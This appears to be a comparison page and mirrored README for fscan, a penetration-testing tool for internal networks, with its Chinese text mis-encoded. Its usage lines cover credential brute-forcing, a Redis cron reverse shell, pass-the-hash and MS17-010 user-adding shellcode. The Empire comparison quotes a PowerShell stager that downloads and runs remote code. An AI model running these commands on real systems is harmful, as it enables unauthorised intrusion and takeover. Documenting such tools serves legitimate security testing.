Top Related Projects
Fast and customizable vulnerability scanner based on simple YAML based DSL.
Nmap - the Network Mapper. Github mirror of official SVN repository.
TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
A Tool for Domain Flyovers
Empire is a PowerShell and Python post-exploitation agent.
E-mails, subdomains and names Harvester - OSINT
Quick Overview
fscan is an internal network scanning tool designed for penetration testing and security assessments. It combines multiple functionalities such as port scanning, service detection, brute-force attacks, and vulnerability exploitation into a single, efficient tool. The project aims to simplify and streamline the process of internal network reconnaissance and vulnerability discovery.
Pros
- All-in-one solution for internal network scanning and exploitation
- Fast and efficient, utilizing concurrent scanning techniques
- Regularly updated with new features and vulnerability checks
- Cross-platform support (Windows, Linux, Mac)
Cons
- Potential for misuse if not handled responsibly
- May trigger antivirus or intrusion detection systems
- Limited documentation, especially for advanced features
- Some features may require additional dependencies or configurations
Getting Started
To get started with fscan:
- Download the latest release from the GitHub repository.
- Extract the executable for your operating system.
- Open a terminal or command prompt and navigate to the directory containing the fscan executable.
- Run fscan with desired options:
# Basic scan of a single IP
./fscan -h 192.168.1.1
# Scan a network range with common ports
./fscan -h 192.168.1.1/24 -p 80,443,3306,3389,5432,6379,9200,11211,27017
# Full scan with all modules enabled
./fscan -h 192.168.1.1/24 -p 1-65535 -ap 1-65535 -vv -o results.txt
For more advanced usage and options, refer to the project's README and documentation on the GitHub repository.
Competitor Comparisons
Fast and customizable vulnerability scanner based on simple YAML based DSL.
Pros of Nuclei
- More extensive and customizable scanning capabilities with a large library of templates
- Active community development and regular updates
- Better documentation and integration with other security tools
Cons of Nuclei
- Steeper learning curve due to its more complex template system
- Potentially slower scanning speed for basic tasks compared to Fscan's lightweight approach
Code Comparison
Fscan (basic port scanning):
func ScanPort(ip string, port int) {
address := fmt.Sprintf("%s:%d", ip, port)
conn, err := net.DialTimeout("tcp", address, time.Second*2)
if err == nil {
conn.Close()
fmt.Printf("Port %d is open\n", port)
}
}
Nuclei (template-based scanning):
id: example-scan
info:
name: Example Scan
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/example"
matchers:
- type: word
words:
- "Example Response"
The code comparison highlights the different approaches: Fscan uses direct Go code for basic port scanning, while Nuclei employs YAML-based templates for more flexible and customizable scans.
Nmap - the Network Mapper. Github mirror of official SVN repository.
Pros of nmap
- Extensive feature set and flexibility for network scanning and discovery
- Large, active community and ongoing development
- Well-documented with comprehensive man pages and online resources
Cons of nmap
- Steeper learning curve for beginners
- Can be slower for large-scale scans compared to more specialized tools
- Requires root/admin privileges for many scan types
Code comparison
nmap:
nmap -sV -sC -p- 192.168.1.0/24
fscan:
fscan.exe -h 192.168.1.1/24 -p 1-65535
Both tools allow for network scanning, but nmap offers more granular control over scan types and options, while fscan provides a simpler syntax for quick scans.
nmap is a comprehensive, well-established network scanning and discovery tool with a wide range of features and customization options. It's ideal for detailed network analysis and security assessments but may require more time to master.
fscan is a lightweight, fast scanner written in Go, designed for internal network scanning. It's easier to use for basic scans and may be quicker for large-scale scans, but lacks some of the advanced features and flexibility of nmap.
Choose nmap for in-depth network analysis and security testing, or fscan for quick and simple internal network scans.
TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
Pros of masscan
- Extremely fast scanning capabilities, able to scan the entire Internet in under 6 minutes
- Written in C, offering high performance and low-level control
- Supports a wide range of scanning options and customization
Cons of masscan
- Primarily focused on port scanning, lacking the broader functionality of fscan
- May require more technical expertise to use effectively
- Less actively maintained, with fewer recent updates compared to fscan
Code Comparison
masscan (C):
int
proto_banner1_tcp(
struct Banner1 *banner1,
struct ProtocolState *pstate,
const unsigned char *px, size_t length,
struct BannerOutput *banout,
struct InteractiveData *more)
{
// TCP protocol handling code
}
fscan (Go):
func (s *Scanner) TCPScan(ip string, port int, service string) {
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), s.Timeout)
if err != nil {
return
}
defer conn.Close()
// Further scanning logic
}
The code snippets demonstrate the different approaches and languages used by each project. masscan's C implementation offers low-level control, while fscan's Go code provides a more high-level and readable structure.
A Tool for Domain Flyovers
Pros of Aquatone
- Specialized in web-based reconnaissance and screenshot capture
- Supports multiple input formats (URLs, Nmap XML, text files)
- Generates comprehensive HTML reports with screenshots and clustering
Cons of Aquatone
- Limited to web-based targets and doesn't perform broader network scanning
- Requires external tools for full functionality (e.g., ChromeDriver)
- Less actively maintained compared to Fscan
Code Comparison
Fscan (Go):
func (s *Scanner) TCPScan(ip string, port int) {
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
if err == nil {
conn.Close()
s.AddResult(ip, port, "open")
}
}
Aquatone (Ruby):
def capture_screenshot(url, output_file)
browser.navigate.to(url)
browser.save_screenshot(output_file)
rescue => e
@logger.error("Error capturing screenshot of #{url}: #{e}")
end
The code snippets highlight the different focus areas of each tool. Fscan performs TCP port scanning, while Aquatone captures web screenshots using a browser automation tool.
Empire is a PowerShell and Python post-exploitation agent.
Pros of Empire
- More comprehensive post-exploitation framework with extensive modules
- Active community and regular updates
- Supports multiple communication protocols for C2
Cons of Empire
- Larger footprint and more complex to set up and use
- Higher likelihood of detection due to its popularity
- Requires more resources to run effectively
Code Comparison
Empire (PowerShell stager):
$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $wc.DownloadString("http://empire.server/launcher");
fscan (Go scanner function):
func (s *Scanner) ScanPort(ip string, port int) (result string, err error) {
conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
if err != nil {
return "", err
}
defer conn.Close()
return fmt.Sprintf("%s:%d open", ip, port), nil
}
Summary
Empire is a more comprehensive post-exploitation framework with extensive capabilities, while fscan is a lightweight, focused network scanner. Empire offers more features but is more complex, while fscan is simpler and easier to use for specific scanning tasks. The choice between them depends on the specific requirements of the security assessment or penetration testing scenario.
E-mails, subdomains and names Harvester - OSINT
Pros of theHarvester
- More comprehensive OSINT gathering capabilities, including email harvesting and domain information collection
- Supports a wider range of search engines and data sources
- Actively maintained with regular updates and contributions from the community
Cons of theHarvester
- Primarily focused on information gathering, lacking the extensive vulnerability scanning features of fscan
- May require additional tools for a complete security assessment
- Can be slower when performing extensive searches across multiple data sources
Code Comparison
theHarvester:
from theHarvester.lib.core import *
from theHarvester.discovery import *
search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()
fscan:
func (s *Scanner) TCPScan(ip string, ports []int) {
for _, port := range ports {
s.ScanPort(ip, port)
}
}
The code snippets highlight the different focus areas of each tool. theHarvester emphasizes OSINT gathering through search engines, while fscan concentrates on network scanning and vulnerability assessment.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
fscan
1. ç®ä»
ä¸æ¬¾å
ç½ç»¼åæ«æå·¥å
·ï¼æ¹ä¾¿ä¸é®èªå¨åãå
¨æ¹ä½æ¼æ«æ«æã
æ¯æ主æºåæ´»æ¢æµã端å£æ«æã常è§æå¡ççç ´ãms17010ãredisæ¹éåå
¬é¥ã计åä»»å¡åå¼¹shellã读åwinç½å¡ä¿¡æ¯ãwebæ纹è¯å«ãwebæ¼æ´æ«æãnetbiosæ¢æµãåæ§è¯å«çåè½ã
2. 主è¦åè½
1.ä¿¡æ¯æé:
- åæ´»æ¢æµ(icmp)
- 端å£æ«æ
2.çç ´åè½:
- åç±»æå¡çç ´(sshãsmbãrdpç)
- æ°æ®åºå¯ç çç ´(mysqlãmssqlãredisãpsqlãoracleç)
3.ç³»ç»ä¿¡æ¯ãæ¼æ´æ«æ:
- netbiosæ¢æµãåæ§è¯å«
- è·åç®æ ç½å¡ä¿¡æ¯
- é«å±æ¼æ´æ«æ(ms17010ç)
4.Webæ¢æµåè½:
- webtitleæ¢æµ
- webæ纹è¯å«(常è§cmsãoaæ¡æ¶ç)
- webæ¼æ´æ«æ(weblogicãst2ç,æ¯æxrayçpoc)
5.æ¼æ´å©ç¨:
- redisåå ¬é¥æå计åä»»å¡
- sshå½ä»¤æ§è¡
- ms17017å©ç¨(æ¤å ¥shellcode),å¦æ·»å ç¨æ·ç
6.å ¶ä»åè½:
- æ件ä¿å
3. 使ç¨è¯´æ
ç®åç¨æ³
fscan.exe -h 192.168.1.1/24 (é»è®¤ä½¿ç¨å
¨é¨æ¨¡å)
fscan.exe -h 192.168.1.1/16 (B段æ«æ)
å ¶ä»ç¨æ³
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(è·³è¿åæ´»æ£æµ ãä¸ä¿åæ件ãè·³è¿web pocæ«æ)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis åå
¬é¥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计åä»»å¡åå¼¹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh çç ´æååï¼å½ä»¤æ§è¡)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (æå®æ¨¡åsshå端å£)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (å è½½æå®æ件çç¨æ·åãå¯ç æ¥è¿è¡çç ´)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (æå®æ«æç»æä¿åè·¯å¾,é»è®¤ä¿åå¨å½åè·¯å¾)
fscan.exe -h 192.168.1.1/8 (A段ç192.x.x.1å192.x.x.254,æ¹ä¾¿å¿«éæ¥çç½æ®µä¿¡æ¯ )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smbå¯ç 碰æ)
fscan.exe -h 192.168.1.1/24 -m ms17010 (æå®æ¨¡å)
fscan.exe -hf ip.txt (以æ件导å
¥)
fscan.exe -u http://baidu.com -proxy 8080 (æ«æå个url,并设置http代ç http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (ä¸è¿è¡çç ´,ä¸æ«Web poc,以åå°æµé)
fscan.exe -h 192.168.1.1/24 -pa 3389 (å¨ååºç¡ä¸,å å
¥3389->rdpæ«æ)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (åªæ¯æç®åtcpåè½ç代ç,é¨ååè½çåºä¸æ¯æ设置代ç)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (å
置添å ç¨æ·çåè½,åªéç¨äºå¤éå·¥å
·,æ´æ¨èå
¶ä»ms17010çä¸é¡¹å©ç¨å·¥å
·)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰æ,xxxx:ntlmhash,å¦32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexecæ åæ¾å½ä»¤æ§è¡)
ç¼è¯å½ä»¤
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (å¯é,å缩ä½ç§¯)
archç¨æ·å®è£
yay -S fscan-git æè
paru -S fscan-git
å®æ´åæ°
-c string
sshå½ä»¤æ§è¡
-cookie string
设置cookie
-debug int
å¤ä¹
没ååº,å°±æå°å½åè¿åº¦(default 60)
-domain string
smbçç ´æ¨¡åæ¶,设置åå
-h string
ç®æ ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
读åæ件ä¸çç®æ
-hn string
æ«ææ¶,è¦è·³è¿çip: -hn 192.168.1.1/24
-m string
设置æ«æ模å¼: -m ssh (default "all")
-no
æ«æç»æä¸ä¿åå°æ件ä¸
-nobr
è·³è¿sqlãftpãsshççå¯ç çç ´
-nopoc
è·³è¿web pocæ«æ
-np
è·³è¿åæ´»æ¢æµ
-num int
web poc åå
éç (default 20)
-o string
æ«æç»æä¿åå°åª (default "result.txt")
-p string
设置æ«æç端å£: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
æ°å¢éè¦æ«æç端å£,-pa 3389 (ä¼å¨åæ端å£å表åºç¡ä¸,æ°å¢è¯¥ç«¯å£)
-path string
fcgiãsmb romote file path
-ping
使ç¨ping代æ¿icmpè¿è¡åæ´»æ¢æµ
-pn string
æ«ææ¶è¦è·³è¿ç端å£,as: -pn 445
-pocname string
æå®web pocç模ç³åå, -pocname weblogic
-proxy string
设置代ç, -proxy http://127.0.0.1:8080
-user string
æå®çç ´æ¶çç¨æ·å
-userf string
æå®çç ´æ¶çç¨æ·åæ件
-pwd string
æå®çç ´æ¶çå¯ç
-pwdf string
æå®çç ´æ¶çå¯ç æ件
-rf string
æå®redisåå
¬é¥ç¨æ¨¡åçæ件 (as: -rf id_rsa.pub)
-rs string
redis计åä»»å¡åå¼¹shellçipç«¯å£ (as: -rs 192.168.1.1:6666)
-silent
éé»æ«æ,éåcsæ«ææ¶ä¸åæ¾
-sshkey string
sshè¿æ¥æ¶,æå®sshç§é¥
-t int
æ«æçº¿ç¨ (default 600)
-time int
端å£æ«æè¶
æ¶æ¶é´ (default 3)
-u string
æå®Urlæ«æ
-uf string
æå®Urlæ件æ«æ
-wt int
web访é®è¶
æ¶æ¶é´ (default 5)
-pocpath string
æå®pocè·¯å¾
-usera string
å¨åæç¨æ·åå
¸åºç¡ä¸,æ°å¢æ°ç¨æ·
-pwda string
å¨åæå¯ç åå
¸åºç¡ä¸,å¢å æ°å¯ç
-socks5
æå®socks5代ç (as: -socks5 socks5://127.0.0.1:1080)
-sc
æå®ms17010å©ç¨æ¨¡åshellcode,å
置添å ç¨æ·çåè½ (as: -sc add)
4. è¿è¡æªå¾
fscan.exe -h 192.168.x.x (å
¨åè½ãms17010ã读åç½å¡ä¿¡æ¯)
fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis åå
¬é¥)
fscan.exe -h 192.168.x.x -c "whoami;id" (ssh å½ä»¤)
fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 ä¸é®æ¯æxrayçpoc
fscan.exe -h 192.168.x.x -p 139 (netbiosæ¢æµãåæ§è¯å«,ä¸å¾ç[+]DC代表åæ§)
go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbiosæ¶,æä¼æ¾ç¤ºå®æ´çnetbiosä¿¡æ¯)
go run .\main.go -h 192.0.0.0/8 -m icmp(æ¢æµæ¯ä¸ªC段çç½å
³åæ°ä¸ªéæºIP,并ç»è®¡top 10 BãC段åæ´»æ°é)
5. å 责声æ
æ¬å·¥å ·ä» é¢ååæ³ææçä¼ä¸å®å ¨å»ºè®¾è¡ä¸ºï¼å¦æ¨éè¦æµè¯æ¬å·¥å ·çå¯ç¨æ§ï¼è¯·èªè¡æ建é¶æºç¯å¢ã
为é¿å 被æ¶æ使ç¨ï¼æ¬é¡¹ç®æææ¶å½çpocå为æ¼æ´çç论å¤æï¼ä¸åå¨æ¼æ´å©ç¨è¿ç¨ï¼ä¸ä¼å¯¹ç®æ åèµ·çå®æ»å»åæ¼æ´å©ç¨ã
å¨ä½¿ç¨æ¬å·¥å ·è¿è¡æ£æµæ¶ï¼æ¨åºç¡®ä¿è¯¥è¡ä¸ºç¬¦åå½å°çæ³å¾æ³è§ï¼å¹¶ä¸å·²ç»åå¾äºè¶³å¤çææã请å¿å¯¹éææç®æ è¿è¡æ«æã
å¦æ¨å¨ä½¿ç¨æ¬å·¥å ·çè¿ç¨ä¸åå¨ä»»ä½éæ³è¡ä¸ºï¼æ¨éèªè¡æ¿æ ç¸åºåæï¼æ们å°ä¸æ¿æ ä»»ä½æ³å¾åè¿å¸¦è´£ä»»ã
å¨å®è£ 并使ç¨æ¬å·¥å ·åï¼è¯·æ¨å¡å¿ 审æ é 读ãå åç解åæ¡æ¬¾å 容ï¼éå¶ãå è´£æ¡æ¬¾æè å ¶ä»æ¶åæ¨é大æççæ¡æ¬¾å¯è½ä¼ä»¥å ç²ãå ä¸å线çå½¢å¼æ示æ¨éç¹æ³¨æã é¤éæ¨å·²å åé 读ãå®å ¨ç解并æ¥åæ¬åè®®æææ¡æ¬¾ï¼å¦åï¼è¯·æ¨ä¸è¦å®è£ 并使ç¨æ¬å·¥å ·ãæ¨ç使ç¨è¡ä¸ºæè æ¨ä»¥å ¶ä»ä»»ä½æ示æè é»ç¤ºæ¹å¼è¡¨ç¤ºæ¥åæ¬åè®®çï¼å³è§ä¸ºæ¨å·²é 读并åææ¬åè®®ç约æã
6. 404StarLink 2.0 - Galaxy
fscan æ¯ 404Team æé¾è®¡å2.0 ä¸çä¸ç¯ï¼å¦æ对fscan æä»»ä½çé®åææ¯æ³è¦æ¾å°ä¼ä¼´äº¤æµï¼å¯ä»¥åèæé¾è®¡åçå 群æ¹å¼ã
æ¼ç¤ºè§é¢ãå®å ¨å·¥å ·ã5大åè½ï¼ä¸é®åå ç½æ«æç¥å¨ââ404æé¾è®¡åfscan
7. Star Chart
8. æèµ
å¦æä½ è§å¾è¿ä¸ªé¡¹ç®å¯¹ä½ æ帮å©ï¼ä½ å¯ä»¥è¯·ä½è å饮æð¹ ç¹æ
9. åèé¾æ¥
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
10. æè¿æ´æ°
[+] 2023/11/13 å å
¥æ§å¶å°é¢è²è¾åº(å¯-nocolor)ãä¿åæ件jsonç»æ(-json)ãä¿®æ¹tlsæä½çæ¬ä¸º1.0ã端å£åç»(-p db,web,service)ã
[+] 2022/11/19 å å
¥hash碰æãwmiexecæ åæ¾å½ä»¤æ§è¡ã
[+] 2022/7/14 -hf æ¯æhost:portåhost/xx:portæ ¼å¼,rule.Search æ£åå¹é
èå´ä»bodyæ¹æheader+body,-nobrä¸åå
å«-nopoc.ä¼åwebtitle è¾åºæ ¼å¼ã
[+] 2022/7/6 å å
¥æå·¥gcåæ¶,å°è¯èçæ ç¨å
åã -url æ¯æéå·éå¼ã ä¿®å¤ä¸ä¸ªpoc模åbugã-nobrä¸åå
å«-nopocã
[+] 2022/7/2 å 强poc fuzz模å,æ¯æè·å¤ä»½æ件ãç®å½ãshiro-key(é»è®¤è·10key,å¯ç¨-fullåæ°è·100key)çãæ°å¢ms17017å©ç¨(使ç¨åæ°: -sc add),å¯å¨ms17010-exp.goèªå®ä¹shellcode,å
置添å ç¨æ·çåè½ã
æ°å¢pocãæ纹ãæ¯æsocks5代çãå bodyæ纹æ´å
¨,é»è®¤ä¸åè·icoå¾æ ã
[+] 2022/4/20 poc模åå å
¥æå®ç®å½ææ件 -pocpath pocè·¯å¾,端å£å¯ä»¥æå®æ件-portf port.txt,rdp模åå å
¥å¤çº¿ç¨çç ´demo, -br xxæå®çº¿ç¨ã
[+] 2022/2/25 æ°å¢-m webonly,è·³è¿ç«¯å£æ«æ,ç´æ¥è®¿é®httpãè´è°¢@AgeloVito
[+] 2022/1/11 æ°å¢oracleå¯ç çç ´ã
[+] 2022/1/7 æ«ip/8æ¶,é»è®¤ä¼æ«æ¯ä¸ªC段çç½å
³åæ°ä¸ªéæºIP,æ¨èåæ°:-h ip/8 -m icmp.æ°å¢LiveTopåè½,æ£æµåæ´»æ¶,é»è®¤ä¼è¾åºtop10çBãC段ipåæ´»æ°éã
[+] 2021/12/7 æ°å¢rdpæ«æ,æ°å¢æ·»å 端å£åæ°-pa 3389(ä¼å¨åæ端å£å表åºç¡ä¸,æ°å¢è¯¥ç«¯å£)ã
[+] 2021/12/1 ä¼åxray解æ模å,æ¯ægroupsãæ°å¢poc,å å
¥httpså¤æ(tlsæ¡æå
),ä¼åip解æ模å(æ¯æææip/xx),å¢å çç ´å
³éåæ° -nobr,æ·»å è·³è¿æäºipæ«æåè½ -hn 192.168.1.1,æ·»å è·³è¿æäºç«¯å£æ«æåè½-pn 21,445,å¢å æ«ædockeræªæææ¼æ´ã
[+] 2021/6/18 æ¹åä¸ä¸pocçæºå¶ï¼å¦æè¯å«åºæ纹ä¼æ ¹æ®æ纹信æ¯åépocï¼å¦æ没æè¯å«å°æ纹æä¼æææpocæä¸éã
[+] 2021/5/29 å å
¥fcgiåè®®æªææå½ä»¤æ§è¡æ«æ,ä¼åpoc模å,ä¼åicmp模å,ssh模åå å
¥ç§é¥è¿æ¥ã
[+] 2021/5/15 æ°å¢win03çæ¬(å åäºxray_poc模å),å¢å -silent éé»æ«æ模å¼,æ·»å webæ纹,ä¿®å¤netbios模åæ°ç»è¶ç,æ·»å ä¸ä¸ªCheckErrsåå
¸,webtitle å¢å gzip解ç ã
[+] 2021/5/6 æ´æ°modåºãpocãæ纹ãä¿®æ¹çº¿ç¨å¤çæºå¶ãnetbiosæ¢æµãåæ§è¯å«æ¨¡åãwebtitleç¼ç 模åçã
[+] 2021/4/22 ä¿®æ¹webtitle模å,å å
¥gbk解ç ã
[+] 2021/4/21 å å
¥netbiosæ¢æµãåæ§è¯å«ã
[+] 2021/3/4 æ¯æ-u urlæè
-uf url.txt,对urlè¿è¡æ¹éæ«æã
[+] 2021/2/25 ä¿®æ¹yaml解æ模å,æ¯æå¯ç çç ´,å¦tomcatå¼±å£ä»¤ãyamlä¸æ°å¢setsåæ°,ç±»å为æ°ç»,ç¨äºåæ¾å¯ç ,å
·ä½çtomcat-manager-week.yamlã
[+] 2021/2/8 å¢å æ纹è¯å«åè½,å¯è¯å«å¸¸è§CMSãæ¡æ¶,å¦è´è¿OAãéè¾¾OAçã
[+] 2021/2/5 ä¿®æ¹icmpåå
模å¼,æ´éå大è§æ¨¡æ¢æµã
ä¿®æ¹æ¥éæ示,-debugæ¶,å¦æ10ç§å
没ææ°çè¿å±,æ¯é10ç§å°±ä¼æå°ä¸ä¸å½åè¿åº¦ã
[+] 2020/12/12 å·²å å
¥yaml解æå¼æ,æ¯æxrayçPoc,é»è®¤ä½¿ç¨ææPoc(已对xrayçpocè¿è¡äºçé),å¯ä»¥ä½¿ç¨-pocname weblogic,åªä½¿ç¨æç§ææ个pocãéè¦goçæ¬1.16以ä¸,åªè½èªè¡ç¼è¯ææ°çgoæ¥è¿è¡æµè¯ã
[+] 2020/12/6 ä¼åicmp模å,æ°å¢-domain åæ°(ç¨äºsmbçç ´æ¨¡å,éç¨äºåç¨æ·) ã
[+] 2020/12/03 ä¼åip段å¤ç模åãicmpã端å£æ«æ模åãæ°å¢æ¯æ192.168.1.1-192.168.255.255ã
[+] 2020/11/17 å¢å -ping åæ°,ä½ç¨æ¯åæ´»æ¢æµæ¨¡åç¨ping代æ¿icmpåå
ã
[+] 2020/11/17 å¢å WebScan模å,æ°å¢shiroç®åè¯å«ãhttps访é®æ¶,è·³è¿è¯ä¹¦è®¤è¯ãå°æå¡æ¨¡ååweb模åçè¶
æ¶åå¼,å¢å -wt åæ°(WebTimeout)ã
[+] 2020/11/16 对icmp模åè¿è¡ä¼å,å¢å -it åæ°(IcmpThreads),é»è®¤11000,éåæ«B段 ã
[+] 2020/11/15 æ¯æip以æ件导å
¥,-hf ip.txt,并对å»éåäºå¤çã
Top Related Projects
Fast and customizable vulnerability scanner based on simple YAML based DSL.
Nmap - the Network Mapper. Github mirror of official SVN repository.
TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
A Tool for Domain Flyovers
Empire is a PowerShell and Python post-exploitation agent.
E-mails, subdomains and names Harvester - OSINT
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot